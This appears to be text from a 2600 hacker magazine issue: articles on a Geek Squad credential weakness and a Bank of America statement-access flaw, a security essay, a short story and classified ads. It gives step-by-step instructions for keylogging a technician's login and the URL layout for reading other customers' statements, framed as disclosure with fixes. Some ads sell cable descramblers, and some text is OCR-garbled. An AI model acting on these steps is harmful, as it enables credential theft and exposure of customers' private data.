What is this article about? Well, it isn't a rant about incompetence. Sorry, guys and gals, but you can find plenty of that on consumerist.com or on countless forums. No, what I am here to talk about is a tiny security issue with huge consequences. Here's how to wreak havoc in five easy steps.
First Step: Call the Geek Squad at 1-800-433-5778 and set up an appointment for a wireless network security install. This is their cheapest and quickest service. Unfortunately, it will cost you $59; as we'll see later, though, this is a small price to pay for such a prize.
Second Step: Install a keylogger on your laptop or desktop computer. Software, hardware, doesn't matter.
Third Step: Reset your wireless router settings to the defaults: disable WEP and WPA, and use the default SSID. Then, sit back and wait for your appointment. A field tech, who we'll call Double Agent, will show up at your door. He or she will take a look at your situation and secure your router with WPA: piece of cake! Thank the agent for their amazing WPA-typing skills and reject any other additional services which they may try to "up-sell."
Fourth Step: Your hero Double Agent will now sit down at your computer, open a web browser, and go to ' . | . . ( | . | i1 Once there, they will type in their login credentials. The username will be something like 123456; the password will be a case-sensitive combination of letters and numbers. The Agent will pull up your name and account on the Geek Squad system, which is called "STS" and which is able to take credit cards via a shopping cart feature, print receipts, add charges, remove charges, and so on. Your receipt will print out, and the Agent will log out and close the browser.
Fifth Step: With the agent gone, you should first change your WPA key to something else. You've now got the Agent's STS login and password.
Thanks to your keylogger, you now have login credentials for STS, giving you access to Geek Squad's entire customer database of literally millions of customers. Addresses, phone numbers, and email addresses are just the beginning. Most Agents, as per corporate policy, also log copious notes of every customer's WPA or WEP key, SSID, IP address, PC make and model, OS, RAM amount, viruses found, and lots more. The Geek Squad database contains information not only about individuals but also about their numerous small business clients.
Note that Agents are required to reset their STS passwords on a regular basis, and a hacked password is easily reset by corporate. Therefore, having an Agent's login credentials is only good for information gathering; once an Agent realizes that his password has been changed, he'll have it reset in minutes. There's no easy way for an Agent to know if an account is being abused, as it's possible to login from multiple computers or browsers at the same time. One could theoretically have unfettered access for months before the Agent is forced to change the password at a server prompt.
Agents are usually clever enough to find keyloggers if they are performing virus removals, system optimizations or upgrades, and similar jobs. The simple fact that they're only out to encrypt your wireless router means they won't even look twice to check background programs or physically examine the machine and inspect for hardware loggers.
Best Buy likes to cut corners, and its employees and customers always get the short end of the stick. A workable solution to the security issue I have discussed would be for Best Buy to provide a laptop to its Agents for on-site use. Companies like HP, Toshiba, or Gateway would probably even split the cost to have these "respected" Geek Squad Agents toting their brand's laptop into impressionable customers' homes. Other prevention techniques that Best Buy might employ include a server-side upgrade requiring a SecurID token for access to STS or limiting lowly Agents' access to the huge database of customer information.
For a company at the cutting edge of new technology, Best Buy is setting their Geek Squad brand up for major trouble. There's huge risk that any of their over 2000 field agents might enter their credentials into a compromised computer. There's also the risk of abuse. At all times, any Agent, Best Buy manager, or call center phone jockey has access to an extravagant amount of customer data. I am no whistle blower or disgruntled employee, but corporations like Best Buy are reactionary. They only act on behalf of customers or employees when they get in trouble. When all other methods fail, I turn to the community!
Bank of America Website Flaw Allows Reading of Other Customers' Statements
by malpelo93@gmail.com

There is a security flaw in Bank of America's website which allows any Bank of America customer to view another customer's credit card statements under certain circumstances. Bank of America was notified of this security issue in a letter, but they replied that they are unwilling to change their website, and the security hole still exists as of the writing of this article.

Only Bank of America credit card holders, not deposit account holders, are affected by this security hole. The flaw relies on two things: first, the section of the bank's website that displays customer statements retrieves the statements by using an unencrypted URL containing the full credit card account number. Second, the same URL used to retrieve one customer's statement can be used by another Bank of America customer to view that same statement and others from the first customer's account.

The URL for viewing a statement in the "statements" section of the Bank of America website is constructed as follows:
https://ccss.bankofamerica.com/NASApp/BofAce/Getfstatement?docId=9054XXXXXXXXXXXXXXSTATEMENTSDocumentArchive$9054XXXXXXXXXXXXXX01102008346&docDate=2008-00-10&docType=PDF&issuer=90&download=false
The "54XXXXXXXXXXXXXX" kept in the web browser's history, where it can be seen by future users of the same computer. This is where the ability to read other customers' statements comes into play.

By copying the above URL to the clipboard, then logging in to a Bank of America account for which one has a legitimate login and password, one is able to paste the URL into the browser address bar. The statement will then be pulled from the server without any validation of which customer is logged in at the time. Conceivably, an attacker could put any valid Bank of America credit card number into the URL and pull that customer's statement; however, he would need to also have the correct statement date (shown as 01102008 and 2008-00-10 in the above URL) as well as the 3-digit random number at the end of the account number and date code, which is 346 in the above example. The issuer code, 90, which is put in front of the account number, does not seem to change, although this has only been verified with a handful of personal and family accounts which this writer has tested. It would be possible to guess the 3-digit random code after enough tries. If an attacker already has the actual URL from a customer, however, then he can simply use that URL, since the 3-digit code appears to be assigned to the statement and not to the login session.

The fact that the full account number is stored and transmitted so clearly was reported to Bank of America about six months ago. Their reply stated, "The account number on your computer's URL is ineffective without the security code and expiration date that is printed only on your credit card. Bank of America monitors the accounts on a daily basis to protect you from fraud... You are not held liable for fraudulent use of the account. Due to system constraints, we are unable to remove the account number from your URL field."

It would seem that Bank of America does not care about the privacy or security of their customers' credit card statements enough to fix this critical flaw in their website.
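The missing check the article describes, shown from the server side as an added example (not code from the article or from the bank). The data store, function names and session layout are hypothetical, and the account numbers are constructed sample values.

```python
import secrets

# Constructed sample data: account numbers and statement bodies are made up.
STATEMENTS = {
    ("5400000000000001", "2008-01-10"): "statement for customer alice",
    ("5400000000000002", "2008-01-10"): "statement for customer bob",
}
ACCOUNT_OWNER = {"5400000000000001": "alice", "5400000000000002": "bob"}


class Forbidden(Exception):
    """The logged-in customer may not read the requested document."""


def new_session(customer):
    """Hypothetical server-side session created at login."""
    return {"customer": customer, "refs": {}}


def fetch_unchecked(session, account, date):
    """Behaviour reported in the article: any valid login is enough,
    and the account number arrives in the URL."""
    if not session.get("customer"):
        raise Forbidden("not logged in")
    return STATEMENTS[(account, date)]


def fetch_checked(session, account, date):
    """Object-level authorization: the requested account must belong
    to the customer who owns this session."""
    customer = session.get("customer")
    if customer is None or ACCOUNT_OWNER.get(account) != customer:
        raise Forbidden("account does not belong to this login")
    return STATEMENTS[(account, date)]


def issue_ref(session, account, date):
    """Hand the browser a random per-session reference instead of the
    account number, so nothing sensitive lands in history or logs."""
    if ACCOUNT_OWNER.get(account) != session["customer"]:
        raise Forbidden("account does not belong to this login")
    token = secrets.token_urlsafe(16)
    session["refs"][token] = (account, date)
    return token


def fetch_by_ref(session, token):
    """Resolve a reference only inside the session that issued it, then
    apply the ownership check again before returning anything."""
    try:
        account, date = session["refs"][token]
    except KeyError:
        raise Forbidden("unknown reference for this session") from None
    return fetch_checked(session, account, date)


if __name__ == "__main__":
    alice, bob = new_session("alice"), new_session("bob")
    # Unchecked handler: bob reads alice's statement with his own login.
    print(fetch_unchecked(bob, "5400000000000001", "2008-01-10"))
    # Checked handler refuses the same request.
    try:
        fetch_checked(bob, "5400000000000001", "2008-01-10")
    except Forbidden as exc:
        print("refused:", exc)
    # A reference copied out of alice's browser history is useless to bob.
    ref = issue_ref(alice, "5400000000000001", "2008-01-10")
    print(fetch_by_ref(alice, ref))
    try:
        fetch_by_ref(bob, ref)
    except Forbidden as exc:
        print("refused:", exc)
```

The ownership check alone closes the hole; the per-session reference additionally addresses the article's second complaint, the full account number sitting in the URL.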
Why is This Computer Connected to the Internet?
by Porter Pyne

I was listening to a recent edition of 2600's weekly audio program Off The Hook, and I heard the host, Emmanuel Goldstein, asking the question, "Why does this computer need to be connected to the internet?"

Ah. An excellent question, and one that is more complicated and convoluted than one might think at first.

I used to work at an unnamed electrical utility. Much of my experience comes from that and from previous work experience as a network administrator and engineer.

So, why are computers that seemingly have no need for internet access connected to the internet?

The short answer: Laziness and expediency.

Even as a security-conscious network administrator, I was inevitably confronted with situations like this one: Someone would tell me, "We have this computer that needs to print labels for visitors to the utility."

"Ok," I'd think. "Sounds like a standalone application."

Then, I'd be told, "We would also like to be able to maintain a list of visitors," and suddenly the system needed to have a database.

Finally, I'd be asked, "Could we also have access to that database from other locations on the LAN and publish the information on the internal web server?" This means that I'd need to give the system network access and easy access for anyone, especially an intruder.

Because network access also inevitably means internet access, we now have the proverbial highway to hell. This machine could have been standalone, if only the corporate management nitwits had allowed it to be that way.

Other reasons for connecting machines to a network include access to network printers; access to the machine for management reasons such as remote access or support, antivirus updates, and the like; or the need for the computer to be able to access or store files on file servers.

So, because Information Technology departments are poorly managed, and workers and administrators already have an overabundance of daily work and artificial and real IT emergencies, it is expedient to be able to access all computers, workstations, printers, alarm systems, and so forth from network management consoles, IT department PCs, and antivirus management servers.

Of course, since IT managers have lower ethics than the average third-world dictator, we must also be able to monitor the usage of each PC, including any web browsing that might be done from that PC. The fact that monitoring an employee's web browsing is tantamount to mental rape is not an issue. In the United States and some other countries, anything done on business computers is subject to monitoring by the IT department. You have no rights to privacy on work computers, period. Whether this is right or wrong is immaterial; it is the law.

Because of all this, computers that have no business being on Internet-connected networks quite inevitably end up on them.

Most people would be surprised to know that electrical grids, water distribution systems, and many other critical infrastructure elements are connected, one way or another, to the internet. If they aren't connected to the internet, they are connected to modems for dial-in access. Because of modems' low bandwidth, we are seeing lower utilization of modems as time goes on. Shivas and other RAS devices have all but dried up, as the applications that used to require modems are now utilizing internet connectivity.

Yes, it is indeed possible to breach these systems with root kits, buffer overflows, or other tricks of the trade; to install VNC or other remote access software and thus open and close floodgates or gain control of electrical grids; to compromise medical computers with diagnostic images; or to do other terrifying things. The potential for mass mayhem and massive loss of life cannot be overstated. The United States and many other countries have a ticking time bomb of massive proportions within the IT infrastructure they have grown addicted to having access to.

To date, I have not seen any major catastrophes related to computer intrusions. By major catastrophes, I mean events that would make natural catastrophes like Katrina, earthquakes, and tsunamis seem small. I attribute this to incredibly good luck and to the fact that the people that want to harm us have not spent any significant effort, or they have not had the mental acuity to perceive the possibility of what they could accomplish.

Even though better security is always an option, budgetary reasons usually prevent it from being pursued. VLANs do not provide substantive security, as switch security is usually questionable. SNMP is a security nightmare, and most switches in use can be compromised with the typical public and private SNMP community strings. VLANs and switch port assignments can then be reassigned rather easily. So, if VLANs are not the answer, are separate networks a possibility?

Sometimes. But you know what happens. Inevitably there is some "business need," usually imaginary, that necessitates the connection of the secure network to the main production, internet-accessible network, thus making the "secure network" insecure. The connection of secure to production networks can be done through a firewall, but this is still substantially less secure than "not connected." The lamentations and death gasps of the network administrator are for naught; if something can be connected with copper or fiber, it will eventually be connected.

Only in rare cases, in companies or government organizations that have some grasp of security, do we end up with computer facilities that are secure from the internet. This is the exception rather than the norm.

In Bruce Willis's movie Live Free or Die Hard, Bruce Willis and the kid hacker have to physically go to electrical transmission and generation centers to get access to the power grids. This, unfortunately, is wishful thinking.

Even if the entity responsible for maintaining that grid uses something approaching a reasonable security policy, they are connected, presumably over a secure network (yeah, right), to computers maintaining downstream distribution grids that are not as secure. You are only as secure as the weakest link in your armor, and smaller distribution grids are the Achilles' heel of electrical grid security. Related to this, SCADA (System Control And Data Acquisition), which is used to control electrical and hydro facilities, has its own set of security problems. A facility in Idaho, maintained by the Department of Energy, performs research into cybersecurity issues that pertain to SCADA systems. They perform demonstrations for interested, Government-approved parties to show how SCADA systems can become compromised.

A concentrated attack on SCADA, EMS, telephone, traffic control, E911, and Internet services is the current-day cyber-armageddon. Industry representatives rant that such a scenario is beyond the bounds of possibility, but we know better, don't we?

I won't spell out, anymore than I already have, how such a nightmare scenario could be achieved, but the astute reader should be able to read between the lines, to Google or Wikipedia anything they need to know more about, and to arrive at a conclusion similar to mine. All of the typical attack vectors are in play: internet access, security vulnerabilities in computers and networks, and social engineering.

The innocent question posed by the Off The Hook host has very real and demonstrably dangerous ramifications that are prevalent throughout the infrastructure of the United States and the world.

The best answer for why a computer is connected to the internet is because it can be done.

The way to mitigate this problem is to have good security personnel that are allowed to perform their jobs. This means having a security policy that is adhered to using security devices that provide a significant level of layered security, using security devices that are themselves secure, using applications and operating systems that are secure, and having secure virus protection, which may in fact not be possible. The best security policy for any machine is for it to have no network connection, no modem, no software updates, and no antivirus software, and for all input to be entered by a little old lady from Kentucky. Why no antivirus software? Because, as some of my referenced material and other internet-accessible material point out, antivirus software is rampant with insecure coding that can itself be an attack vector for compromising a computer. So, scan the machine with an antivirus program when it is set up, but don't install any antivirus software. Indeed, after the initial install, don't install any additional software. If it works, don't fix it; if it's secure, don't booger it up or risk a virus infection by adding new software. Remove the floppy drive, and put glue from a glue gun into the network, modem, and USB ports. Why the little old lady from Kentucky? She doesn't fit the hacker profile, but are we really sure about her? I think I saw a copy of 2600 and a Phrack printout inside her handbag, along with a USB thumbdrive labeled "root kits."

Some of these security measures are not within the grasp of some business environments, but some of them are possible, with the most fundamental and most critical piece being the security policy.

What is the best recipe for a good security policy? That is the topic for another article.

References

"Anti-virus protection gets worse," http://www.channelregister.co.uk/2007/12/21/dwindling_antivirus_protection/

"Unix admin tried to axe power grid," http://www.infoworld.com/cgi-bin/redirect?source=rss&url=http://www.infoworld.com/article/07/12/14/Unix-admin-tried-to-axe-power-grid_1.html

"Haxdoors of the Kaspersky Antivirus 6/7," http://rootkit.com/newsread.php?newsid=778

"Computers' Insecure Security," http://www.businessweek.com/technology/content/jun2005/tc20050617_1613_tc024.htm
by Peter Wrenshall

I enjoy reading your magazine, and though I am not a computer hacker or cracker, I thought you might be interested to hear about how I once nearly got arrested for hacking and ended up working as a security consultant.

It happened while I was clerking for one of the big haulage firms. The job involved tracing delivery trucks, photocopying documents, and delivering mail, even though this was twenty years after the experts announced the arrival of the paperless office. It was hassle from nine to five. From the first day, I wanted to quit, but having left school two years earlier at sixteen, I didn't exactly have many career choices. I was studying at night school to become a computer network engineer, but I was three exams away from being qualified.

The only good thing about the job was that I was free to wander around the entire building with the mail cart. Within a few days of starting, I had found a deserted part of the building, the east wing of the sixth floor, where I could go and slack off, and look down at all the rat racers running to and from their interesting, high-paying jobs. Even better, I could get some coursework done.

On the Friday of my first week, I hid a pile of study notes under a stack of mail and rolled the mail cart up to the sixth floor. I walked past the sign showing what the spiffy conference suite they were building up there would look like when it was finished, and I went into one of the empty offices. I opened my notes, and started reading about IP version six. I hadn't been studying long when I noticed a persistent tapping sound. I looked around, but there was nothing in the room, which was bare. There wasn't even any carpet. I went out into the corridor and peered into the office next door. On the concrete floor, almost hidden from view, was an ancient computer workstation, which looked like it had been built not long after the dinosaurs had died out. I could see that error messages had filled the screen.

"It's none of my business," I thought. But as I say, in those days I was fixed on the idea of working with computers, and it wasn't long before my curiosity got the better of me. I went into the office, and crouched down to take a look. There was a manufacturer's decal on the front of the machine but nothing else. I looked around for some tag or label to tell me what machine it was and, more to the point, what it was doing alone in a deserted room, but the machine was as bare as the room it was in.

A network cable came out of the back and went into a socket on the wall, so I figured that the computer was still in use as part of someone's not-quite-dead project, or that it had simply been forgotten about. The noisy hard disk whirred, died, and then whirred again, as if the machine was doing some work in the background, or had become stuck in the infinite-loop that 1960s science fiction foretold. I looked at the screen filled with error messages. Whatever program had been running, it had well and truly fallen over, since the command-line was available, leaving the machine totally open.

The cursor blinked at me, as if to say, "Please help me, for I am broken."

I've always liked computers, and they've always liked me, so I was happy to reboot this machine to allow it to continue the labors the ancients had set for it. But first I thought I'd have a little look, you know, just to see what operating system it was running.

Bending low to type on the keyboard, I opened a few files and soon found out the machine was running an old version of Linux. I was just considering whether I should open the password file, to add my own user account, when I heard the voice of doom behind me.

"What are you doing?" it demanded.

I typed the exit command and hit enter. After the screen had cleared, I turned to see some guy in his forties, wearing overalls.

"Nothing," I said, weakly. I went to leave, but he was a hefty guy, and he blocked the doorway. "Wait there," he said. He pulled out
a mobile phone and dialed.

"Hello?" he growled into the handset. To cut a long story short, the room soon filled with people, most of them wearing suits that would have taken a quarter of my yearly salary to buy. The only one to introduce himself was Barker. He was, he said, the IT manager.

"Who are you, and what were you doing with that computer?" he said.

"I'm Karl Ripley. I noticed the machine had crashed," I replied, avoiding any reference to my being a mail clerk on my first week.

"Tampering with computers is an offense."

"Criminal offense," added the admin, just in time for the arriving security guard to hear it. There was a lull in the cross-questioning while everybody seemed to be waiting for me to say something. A couple of Microsoft minutes went by, but I couldn't find anything to say. My brain was slowly filling with images of me pushing a mail cart around the Cedar Creek Federal Correctional Facility. I wondered what kind of jail time hacking carried.

"I wasn't tampering, just looking. I know I should have phoned the helpdesk, but it's my first week here, and I forgot the number." Actually, I had never known it. The only computing that general clerks were allowed to do was computing the square root of nothing.

"This kid could have been hacking," the admin said. "I think we should call the police." My stomach did a somersault. Obviously, this crufty-looking workstation held some sort of commercial data, like the payroll details for the last ten years or the file on who won Office Clerk of the Month. I looked around at the crowd. Nobody objected to the admin's suggestion. I saw the security guard move slightly to his left, blocking the exit a little more, and I felt the first drop of sweat run down my forehead. Only Barker looked unconcerned.

"Let's not overreact," he said. "Somebody walks into an open office and looks at a computer, it's hardly a felony."

"This area is closed off," the admin said defensively. "Nobody is allowed up here."

Barker turned back to me, and said, "What are you doing in this section, anyway?"

"I push my cart through here," I said, a bit breathlessly. "It's shorter than going back through the other section twice."

It all sounded innocent enough, which in a way it was. Barker let out a weary breath.

"I don't have time for this," he said to no one in particular. He looked at me, and then looked at the machine, then back at me again.

"You didn't do anything with that machine?"

"No, definitely not. I was just looking."

"Yes, but I don't get why would you be interested in it, anyway. What business is it of yours?"

I shrugged. "I wondered what had gone wrong with it. The screen was full of errors." I stopped talking, hoping that it was explanation enough. When that didn't get any response from Barker, I continued.

"I'm taking a night-school course in computers, and there's a troubleshooting module. I thought that I might recognize the errors."

Barker looked around at the suits, to see how they took my explanation. Then he looked me over, and I realized that he just wanted to get rid of me. Like most IT managers, he probably had twelve hours of work to fit into an eight-hour workday.

"Look," he said, "I'm going to give you the benefit of the doubt this time, because it's your first week here, and you obviously don't know the local rules. But from now on, this section is off-limits. And if you see any problems with any other computers, then do us all a favor and just ring the helpdesk. Don't stand looking at the screen, because around here..."

I felt the tension in my body vanish, and I was just about to start breathing again when the guy in overalls, the one who had found me, interrupted Barker.

"I told you, he wasn't just looking at the screen," he said. "He was typing on the keys."

I'd forgotten he was there. The whole room turned to look at him, and Barker glared at him, as if he was annoyed at him for making a big deal out of nothing. The janitor glared back. Maybe, I thought, he also used the sixth floor for slacking off or brewing moonshine or something, and I had intruded on his turf.

"I saw him," he added defensively. Barker turned back to me. His eyebrows rose as he waited for an answer. There was no sense denying it.

"I only cleared the screen," I said. "I was going to call it in to the helpdesk when I got back downstairs." That was lame, and I cringed while saying it. Barker looked more disappointed than annoyed.

"Can you check what he typed on that machine?" he asked the admin.

"Possibly," was the admin's reply. He sounded unsure. That was a good sign. In my experience, it's rare to find an administrator who is as good with Linux as he is with Microsoft Windows. It's like finding someone who can write with their left and right hands equally well. Most people I knew used either Windows or Linux. I was hoping the admin standing at the workstation fell into the
Windows category.

"I'll check the history log," he said. My hope of him not knowing Linux vanished, and my heart sank. The history log on Linux is the file that keeps track of every command typed, and I knew that it would have a list of my recent activity. As I say, I am not much of a hacker, and hadn't bothered to delete anything to cover my tracks. I hadn't expected there was going to be an investigation. Thank god I hadn't created a user account. "Hacker creates backdoor to steal commercial secrets," the headlines would have said.

The admin logged on to the machine, and I watched him open the history file for the root user.

"He's been looking in the process directory," he said. He looked up with an outraged expression like a TV lawyer, only less sincere.

"What does that mean?" snapped Barker.

"He was probably trying to find out what services are available."

Barker turned back to me, assuming the full authority of his official role.

"Did you type those commands?" he demanded, jabbing his finger at the screen.

Until then, I had wanted to be honest, and if it had been just Barker on his own, I'd have told him what I had done. Even though what I'd done wasn't itself a crime, I knew that someone somewhere could probably make a three-act courtroom drama out of it. They'd lawyer up and hang me out to dry, I knew it. So I lied.

"Which commands?" I said innocently. The admin helpfully stepped away from being in front of the screen, and I made a pretense of looking at the evidence. There on the screen were the commands I had used to inspect the machine. But I soon realized that in his eagerness to prove his point, the admin had made a mistake. Not only was he not a Linux guru, he wasn't much of an admin, either.

"No," I said, firmly. "That just tells you what the last commands were. It doesn't tell you who typed them, or when they were typed. It could have been anybody. And it could have been weeks ago."

I thought I saw a hint of a smile appear on Barker's face, which was quickly replaced with his official expression. I had impressed the suits, too. A few raised expectant eyebrows toward the admin. There is a surprising lack of bias in management stiffs. Sure, they obviously enjoy a good feeding frenzy, but you'd think they'd automatically cheer for the guy in the most expensive suit, and that's not true. Instead, it's a case of line 'em up and may the best man win.

Barker stood there silently, looking at me, perhaps wondering if what I had said made sense. I wasn't sure myself. My Linux skills were not exactly brilliant, but I was hoping that they were better than the admin-from-hell's.

"Who are you?" Barker said suddenly. Then he rephrased it. "I mean, you don't work in my department. What is it you do here?"

"I work in the mail room," I croaked, which had an even better effect on the suits than the history-file remark. Barker looked around, clearly puzzled. The admin looked at me, and I knew he knew he couldn't back up his accusation. I also knew that I'd made an enemy forever. Office enemies, though, I can live with.

"You can't let him go," the admin said. "Those commands must have come from him."

"You don't have any evidence," said Barker.

"He was seen typing by a witness. It is a criminal offense to access a computer that you are not authorized to use. If you don't call the police, I will." He unclipped a mobile phone from his belt. He was going to use it. I had another vision, one of my career being over. Not only that, but these people were from one of the biggest companies in the country. They didn't deal in dimes; they were used to working with millions of dollars daily. When asked to assess the damages to their supposedly-hacked network, they'd have no trouble cooking up some seven-figure sum to put in front of a judge. I got a hollow feeling in my stomach. I knew that even if I didn't get jailed, I'd have a hacking rap on my record, and then nobody was ever going to hire me to work in computers ever again. I was going to be a fifty-year-old general clerk, still living with my parents, hoping to have a heart attack just so I didn't have to push that cart around an office I hated.

We stood in silence for a moment, the admin poised to dial. I could see the security guard tensing his hands, getting ready for action. In the silence, I heard the machine's noisy hard disk spin up again, and start whirring, and I looked at the screen. And then I had my second brain wave of the morning.

"It's not a criminal offense," I said. "Not on that computer."

I waited for Barker to say something, but nobody said a word. I pointed at the screen, where the admin had just logged in.

"Your system says 'welcome' whenever anybody logs in."

Every head in the room turned to look at the screen. There at the top was the message of the day, the text that accompanies every logon. Right next to the name of the company
was the word "Wel come. "
"A wel come can be l ega l l y construed as an
i nvi t at i on. Pl us there was no warn i ng t hat t hi s
i s a restri cted system. "
I watched my audience, their business brains digesting the information.
"And, since the program had crashed, and I hadn't actually logged in," I added, "then legally speaking I haven't done anything wrong." Barker turned to the admin.
"Is that true?" he asked. The admin stood there, holding his phone, and tensing his jaw. He didn't reply. Actually, I had no idea if it was true, either. Barker let out a long breath through his nose, then spoke again.
"How many other machines have we got like that?" He wasn't holding back now. He was seriously annoyed, and he was letting the admin have it. Luckily for me, there was some administrative turf-war going on between the two. Office politics: don't you just love it?
"I don't know," said the admin, reluctantly. "You'll have to ask Bill. It's his box." I gathered that Bill was the company's UNIX wizard. "But this kid shouldn't be touching it."
"It shouldn't be on the floor in an empty office. What's it doing in here anyway?" snapped Barker. The admin was going to say something, but Barker preempted him.
"You'd better get Bill up here today. I don't care what he's doing; tell him to get up here now. We need the standard warning message on every Linux machine, today."
"But there are dozens of them," said the admin, a bit whiney.
"It's simple. Just change the message of the day," I suggested helpfully.
Barker shot me a look, and I shut my mouth, and looked suitably serious. Contrite, I think is the word.
"Just get it done," he said to the admin. "And get this machine out of here and into the server room."
The admin was outranked, and he knew it. He nodded silently. At the back of every office drone's mind is the mortgage he has to pay. More likely, the admin was simply following the route to the top that the ads secretly suggest: obey silently, and one day you can be the winner of the rat race. Barker turned to me.
"Go back to your work, and if you touch another machine in here, I'll personally call the police."
"I won't," I said. "Thanks."
I headed to the door. The guard stepped aside to let me pass, and I left him and the Inquisition to their post-event discussion and went out. I grabbed the cart and hustled along the corridor as fast as my wheels would go. I hit the button to fetch the elevator, and I could hear the suits filing out of the room, their spectator sport over with, going back to writing memorandums to the board. The door opened and I got in. As the elevator descended, I said a silent prayer to whomever the patron saint of hackers is, and quietly resolved that my firstborn male child would be named Barker.
I exited on the ground floor, almost colliding with one of the junior clerks who was always bugging me about putting her mail on the desk instead of in the proper tray.
"Oops," I said, with a friendly smile. She was cute, and I guess the recent excitement had caught me off guard, the adrenalin had given me confidence, or something, and so I said, "How's it going?" or words to that effect. She walked away without saying anything, the perfect end to a perfect day.
I went down the corridor and into the mail room, and I stayed there until five o'clock. It's funny how a close brush with imprisonment can make mail sorting seem like fun.
I never found out what was on that workstation or why it was in that empty room, and I never asked. But I did get a call on the following Monday. It was Barker. He wanted to know if I would like to work for him in the IT department. He said that he needed people with Linux skills. Of course, I accepted, and a few months of study and three exams later, I was given the official title of network engineer. Basically, I get paid to play with networks, to see where the security holes are, and occasionally to swap out a broken switch.
These days, I can afford to buy computer equipment from this century. I never went back to a life of criminal hacking, and I've never had to push a cart around an office ever again - so far. But I did manage to bump into that clerk, the one I collided with on my first week. This time, I got a smile, and as I watched her walk away, I noticed a bit of a sway in her hips that hadn't been there before.
I'd tell you about how the computer on her desk developed a network fault that only I could fix, but you can probably guess the details.
Have an interesting fictional story concerning hacking that you'd like to test out on our readers? Send it on in to articles@2600.com. Please tell us it's fiction so we don't inadvertently spread a pack of lies.
Happenings
PHREAKNIC 12. Nashville 2600 is once again proud to present PhreakNIC 12, held every year in Nashville, TN. We are holding this technology conference in the same location as the past ' years, the Days Inn at the Stadium on October 24th-26th, 2008. Visit http://phreaknic.info for the latest information, including hotel booking information and pre-registration. Call (615) 254-1551 and mention "PhreakNIC" for the special rate of $67/night.
For Sale
SECURITY SYSTEM FOR SALE, under $100 and no monthly fees. I am selling security systems to protect your computer or personal space such as a dormitory or apartment, etc. This covert alarm system calls your cell phone on detection of intrusion, then allowing you to use your cell phone to hear the intruder's activities through a sound amplified microphone on the unit. This alarm system is disguised as an ordinary house phone and is also a working phone! (Great for offices.) Best security system money can get for under $100 and no monthly fees. Order now for $75 only at www.CNC-Distribution.com/CNC
MAC SPYWARE - anti-spyware for the Mac OS X, detects, isolates, and removes spyware and over 8000 tracking cookies. Thirty day free trial - http://macscan.securemac.com/ - Help us promote MacScan, receive a free copy, and swag - macsec@securemac.com for details.
CRACKER FRIENDLY GLASS TOBACCO PIPES, water pipes, chamber pipes, and accessories. Liquidation sale! For those pulling all-nighters who need help focusing. Free shipping for orders over $30. Email kurlie1984S@yahoo.com for pics and questions. Must be 18!
CABLE TV DESCRAMBLERS. New. Each $45 + $5 shipping, money order/cash only. Works on analog or analog/digital cable systems. Premium channels and possibly PPV depending on system. Complete with 110vac power supply. Purchaser assumes sole responsibility for notifying cable operator of use of descrambler. Requires a cable TV converter (i.e., Radio Shack) to be used with the unit. Cable connects to the converter, then the descrambler, then the output goes to TV set tuned to channel 3. CD 9621 Olive, Box 28992-TS, Olivettet Sur, Missouri 63132. Email: cabledescramblerguy@yahoo.com.
TV-B-GONE. Turn off TVs in public places! Airports, restaurants, bars, anywhere there's a TV. Now available as an open source kit, as well as the super-popular original keychain. The kit turns off TVs at 40 yards! And now, for professionals, the TV-B-Gone Pro turns off TVs up to 100 yards away! 2600 readers get 10% discount on TV-B-Gone keychains - use Coupon Code: 2600. www.TVBGone.com
JEAH.NET supports 2600, because we read too! JEAH.NET continues to be #1 for fast, stable FreeBSD shell accounts with hundreds of vhost domains, FreeBSD and Plesk web hosting, 100% private and secure domain registration, and aggressive merchant solutions. 2600 readers' setup fees are always waived at JEAH.NET.
J!NX-HACKER CLOTHING/GEAR. Tired of being naked? JINX.com has 300+ T's, sweatshirts, stickers, and hats for those rare times that you need to leave your house. We've got swag for everyone, from the budding n00blet to the vintage geek. So take a five minute break from surfing pr0n and check out http://www.JINX.com. Uber-Secret-Special-Mega Promo: Use "2600v25no2" and get 10% off of your order.
VENDING MACHINE JACKPOTTERS. Go to www.hackershomepage.com for Vending & Slot Machine Jackpotters, Safe Crackers, Lock Picks, Phone Devices & Controversial Hacking Publications.
NET DETECTIVE. Whether you're just curious, trying to locate or find out about people for personal or business reasons, or you're looking for people you've fallen out of touch with, Net Detective makes it all possible! Net Detective is used worldwide by private investigators and detectives, as well as everyday people who use it to find lost relatives, old high school and army buddies, deadbeat parents, lost loves, people that owe them money, and just plain old snooping around. Visit us today at www.netdetective.org.uk.
NETWORKING AND SECURITY PRODUCTS available at OvationTechnology.com. We're a supplier of Network Security and Internet Privacy products. Our online store features VPN and firewall hardware, wireless hardware, cable and DSL modems/routers, IP access devices, VoIP products, parental control products, and ethernet switches. We pride ourselves on providing the highest level of technical expertise and customer satisfaction. Our commitment to you... No surprises! Buy with confidence! Security and Privacy is our business! Visit us at http://www.OvationTechnology.com/store.htm.
REAL WORLD HACKING: Interested in rooftops, steam tunnels, and the like? Read the all-new Access All Areas, a guidebook to the art of urban exploration, from the author of Infiltration zine. Send $20 postpaid in the US or Canada, or $2. overseas, to PO Box 13, Station E, Toronto, ON M6H 4E1, Canada, or order online at www.infiltration.org.
FREEDOM DOWNTIME DVD! Years in the making but we hope it was worth the wait. A double DVD set that includes the two hour documentary, an in-depth interview with Kevin Mitnick, and nearly three hours of extra scenes, lost footage, and miscellaneous stuff. Plus captioning for 20 (that's right, 20) languages, commentary track, and a lot of things you'll just have to find for yourself! The entire two disc set can be had by sending $., 0 to Freedom Downtime DVD, PO Box 752, Middle Island, NY 11953 USA or by ordering from our online store at http://store.2600.com. (VHS copies of the film still available for $15.)
Help Wanted
LOOKING FOR HELP from anyone in the writing of a proposal to help me try to reinstate personal computers in the East Jersey State Prison in Rahway, New Jersey. We are operating under a new commissioner since the computers were taken away in 1995 due to policy revisions for no reason at all. If anyone knows someone that knows someone that knows the commissioner of the New Jersey State Prisons, we seek your help in this matter. I am also looking for anyone who is willing to help me with my programming skills. Anything will be a plus. Contact info: Akmed R. Fluker, 467096/853803A, Lock Bag R, Rahway, New Jersey 07065. Peace and brotherhood to all.
RENEGADE BLACK SHEEP TECH ENTREPRENEUR in process of putting flesh on the bones of an encrypted voice communications project. Do you have experience in the deep details of VoIP/SIP protocols, network traffic analysis, billing system construction, PtoP routing, and so on? Interested in working with a top-end team to build a world-changing tool for regular folks around the world to use in their everyday lives? Contact me at wrinko@hushmail.com.
Wanted
LOOKING FOR 2600 READERS who would like to offer their services for hire. Want to make money working from home or on the road, call (740) 544-6563 extension 10.
